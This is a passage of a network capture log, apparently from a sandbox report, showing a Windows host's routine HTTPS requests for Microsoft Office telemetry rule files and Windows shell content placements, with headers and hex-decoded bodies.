</L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.6	49722	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:20 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:21 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:21 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: 05856cf7-f01e-0020-4060-3b956b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060921Z-178bfbc474bv7whqhC1NYC1fg4000000040g00000000d5c7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:21 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.6	49725	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:20 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:21 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:21 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: 2bdd5943-e01e-0052-493a-3dd9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060921Z-178bfbc474bv587zhC1NYCny5w00000003wg00000000dvfg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:21 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.6	49726	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:20 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:21 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:21 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: f3d0c3d3-f01e-003c-676b-3b8cf0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060921Z-178bfbc474bgvl54hC1NYCsfuw00000003xg00000000p0tn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:21 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.6	49724	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:20 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:21 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:21 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: d279acb6-501e-0029-6110-3dd0b8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060921Z-178bfbc474bvjk8shC1NYC83ns00000003vg00000000eg12 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:21 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.6	49723	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:20 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:21 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:21 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: 1c744767-001e-0082-6060-3b5880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060921Z-178bfbc474b9fdhphC1NYCac0n000000042g0000000022b7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:21 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49727	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:21 UTC	2610	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241123T060918Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=de2ef3e94b90417eab98371b009a50e8&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=597591&metered=false&nettype=ethernet&npid=sc-280815&oemName=ehijqc%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=ehijqc20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=597591&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waas [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: cid=128000000001627409&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEHiia57ZOKKGVfxa1MdokIiwAarKbrEoPrZgMTLds2BehW1ahw13UJQ3xPnFpMpY1DKsJaz1MtgbLHqfy+j/ijItarPsUYZNRT4/m0DWmeDG4ynj7mZq+3o/yGM2qVn7PeJKfHEO+GlXD3681O2bsFegUDSl3W+uv5WDEZ/ziUbtCu2zYtOH3eqlwqP0RzSHLsTIXc6Jzy4IqcIaZGSDMDOwswoDo9+pr38c+2XdGOoJAA8PaKWtN1nQpsMJnqoDvvFudXvijYItjCd+pX8R4mqBmX7OIcl3PhOpGHDixD/dfHeKTXh1sE71Acqb6Tur/f6CvIuSR+isV8ykDFvwZtXvRFBCzSpFdm5q0uXYPvJB8bd6wT6xJ6QtIxKxFWypKPUYXFdnvCLb5v5FxoocP8foAgpqk231am8Y/TM+JYyN6V9LvV215wI0Z+oUjq7xojOZeFqv/P8S7sN82fb+SPTsi5+3HD/jgTvfp37yQEjEuGRiIJ9I1ivcQoWli3A7EpkszyeR6bs7sRxOhScp9AAhlCAFqyIIEZyhMmGu5swmT6TkpojM9pAGdIHH/kvcbTylXAaEbHIqHdro+X3YUfeb0tcB&p= Cache-Control: no-cache MS-CV: KV23mrU2tE2b7UBv.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-23 06:09:22 UTC	955	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2968 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"RADIDS":"1,P425116123-T1-C128000000001627409+B+P20+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}] X-ARC-SIG: fm5hNt6px9fi0IQuOjiU0hKKZ+xaJoe7dCpWqCV0TjUxEZX5ix4Oqv+cK2kgbfEnzGEbTHxZt41U53UBM82Q0e+CJ0JAJSLL3fPxhb0CuM4S5t4nz2YNjTSedx56uyYhpeORMdC21f1B15TSFFHiH2SuRXTvTt88+kkS/SUKj5UHmy6ketEPfFbPpxnDCevaxmg9paFDnImQGYnbKXylrb4KJZCV2M+7dbYzaIkSRsr4HlnRvogDzhCMMvLkCpCSPqTS6J0EljkxE446fqG2Mk3wtu8XSgMBahWp2D3tsPQ3HWRaCT246nXVA5iWAkUcFjQBXdAc8UVMZeWYqJf8Bg== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sat, 23 Nov 2024 06:09:21 GMT Connection: close
2024-11-23 06:09:22 UTC	2968	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49728	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:22 UTC	2608	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241123T060918Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=ef23dd4ecda947f5828854712e5a4867&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=597591&metered=false&nettype=ethernet&npid=sc-338388&oemName=ehijqc%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=ehijqc20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=597591&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: cid=531098720&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEHiia57ZOKKGVfxa1MdokIiwAarKbrEoPrZgMTLds2BehW1ahw13UJQ3xPnFpMpY1DKsJaz1MtgbLHqfy+j/ijItarPsUYZNRT4/m0DWmeDG4ynj7mZq+3o/yGM2qVn7PeJKfHEO+GlXD3681O2bsFegUDSl3W+uv5WDEZ/ziUbtCu2zYtOH3eqlwqP0RzSHLsTIXc6Jzy4IqcIaZGSDMDOwswoDo9+pr38c+2XdGOoJAA8PaKWtN1nQpsMJnqoDvvFudXvijYItjCd+pX8R4mqBmX7OIcl3PhOpGHDixD/dfHeKTXh1sE71Acqb6Tur/f6CvIuSR+isV8ykDFvwZtXvRFBCzSpFdm5q0uXYPvJB8bd6wT6xJ6QtIxKxFWypKPUYXFdnvCLb5v5FxoocP8foAgpqk231am8Y/TM+JYyN6V9LvV215wI0Z+oUjq7xojOZeFqv/P8S7sN82fb+SPTsi5+3HD/jgTvfp37yQEjEuGRiIJ9I1ivcQoWli3A7EpkszyeR6bs7sRxOhScp9AAhlCAFqyIIEZyhMmGu5swmT6TkpojM9pAGdIHH/kvcbTylXAaEbHIqHdro+X3YUfeb0tcB&p= Cache-Control: no-cache MS-CV: KV23mrU2tE2b7UBv.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-23 06:09:23 UTC	814	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 3892 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-ARC-SIG: YYWeWAGsYVByNOxQilWHrjDjDgUMPsA+xUxACQMOq8J3UmblTVTjgJ7KFmrErnTzZ1RYJIxyy/k0Q8zqnjMGDg+r+Xtd1suLYGS4pkhFzr7bbHxP1+dK95/lmQzL9RQlPgxyAYGH5a+bK4rb8J+B3is428SYKMom9fls86wr2adW5LDUo6XH/35JSy+dSF7GD0vI2+O0n2ELEPB2PeOqJ1ZuGmwM9FKKU++nfHkCu/aIj1PXnpt3FhkUIWvvlPNBjFTzrWWjhMQDcekWPGLPjqUIh0bpF+s5At/58qhXAWt8LRV/nQErbf2lKJj1H3AijyMPNRALkNQTDQAR9i7chg== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sat, 23 Nov 2024 06:09:22 GMT Connection: close
2024-11-23 06:09:23 UTC	3892	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 53 75 67 67 65 73 74 69 6f 6e 73 4f 6e 53 74 61 72 74 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 7d 2c 5c 22 70 72 6f 70 65 72 74 69 65 73 5c 22 3a 7b 7d 2c 5c 22 74 72 61 63 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"SuggestionsOnStart\",\"propertyManifest\":{},\"properties\":{},\"trac

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49730	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:22 UTC	2638	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241123T060918Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=eefd359bfb4241cb9a7c4cc840b0b3bd&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=597591&metered=false&nettype=ethernet&npid=sc-338387&oemName=ehijqc%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&sc-mode=0&scmid=Public&smBiosDm=ehijqc20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=597591&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1& [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: cid=530911393,530840334,530725852&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEHiia57ZOKKGVfxa1MdokIiwAarKbrEoPrZgMTLds2BehW1ahw13UJQ3xPnFpMpY1DKsJaz1MtgbLHqfy+j/ijItarPsUYZNRT4/m0DWmeDG4ynj7mZq+3o/yGM2qVn7PeJKfHEO+GlXD3681O2bsFegUDSl3W+uv5WDEZ/ziUbtCu2zYtOH3eqlwqP0RzSHLsTIXc6Jzy4IqcIaZGSDMDOwswoDo9+pr38c+2XdGOoJAA8PaKWtN1nQpsMJnqoDvvFudXvijYItjCd+pX8R4mqBmX7OIcl3PhOpGHDixD/dfHeKT